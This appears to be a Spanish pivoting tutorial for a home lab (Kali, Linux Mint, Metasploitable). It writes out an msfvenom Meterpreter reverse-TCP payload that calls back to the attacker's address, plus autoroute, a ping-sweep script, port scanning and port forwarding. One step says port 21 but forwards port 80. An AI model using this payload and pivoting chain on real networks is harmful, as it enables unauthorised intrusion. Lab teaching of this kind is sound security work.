Lo primero será ir a la parte de herramientas y Administrador de red:
Y ahora vamos a la parte de redes NAT y creamos nuestra primera red con estos parámetros:
Por tanto, una vez creada esta red sobre la que haremos pivoting, veremos como configuraremos las 3 máquinas: MÁQUINA KALI:
MÁQUINA LINUX INTERMEDIA:
MÁQUINA METASPLOITABLE FINAL:
De tal forma que la máquina kali tiene conectividad solo con la máquina Linux Mint; y la máquina Linux mint tiene conectividad tanto con la Kali como con la metasploitable:
Lo primero será ponernos a la escucha con el multi/handler, utilizando el siguiente payload:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
Y ahora con msfvenom generamos el payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.32 LPORT=4444 -f elf -b '\x00\x0a\x0d' -o virus
Lo ejecutamos dentro de la máquina objetivo:
Y en metasploit habremos recibido una sesión de meterpreter:
En este punto ya podemos listar las interfaces de red para poder establecer el tráfico o la tunelización con el comando ipconfig:
Ahora para tunelizar todo el tráfico de la máquina ubuntu a la máquina atacante, tenemos que poner la sesión de meterpreter en segundo plano, de tal forma que podamos listarla usando el comando sessions -l:
Ahora utilizamos el módulo de autoroute para enturar el tráfico:
use post/multi/manage/autoroute
Ahora vamos a detectar equipos conectados dentro de la red interna, por lo que usaremos el siguiente script de bash:
#!/bin/bash for i in {1..255}; do timeout 1 bash -c "ping -c 1 10.10.10.$i" >/dev/null if [ $? -eq 0 ]; then echo "El host 10.10.10.$i está activo" fi done
Compartiéndolo desde nuestra máquina atacante:
Con la máquina víctima:
Lo ejecutamos y detectamos equipos:
Por ejemplo, vamos a escanear la IP 10.10.10.5, por lo que usamos el siguiente módulo para escanear sus puertos:
use scanner/portscan/tcp
Le pasamos la IP de la máquina objetivo (por ejemplo la 10.10.10.5) y vemos que nos devuelve los puertos abiertos:
Vamos a suponer que queremos llegar al puerto 21, por lo que tendríamos que hacer un port forwarding:
portfwd add -l 5000 -p 80 -r 10.10.10.5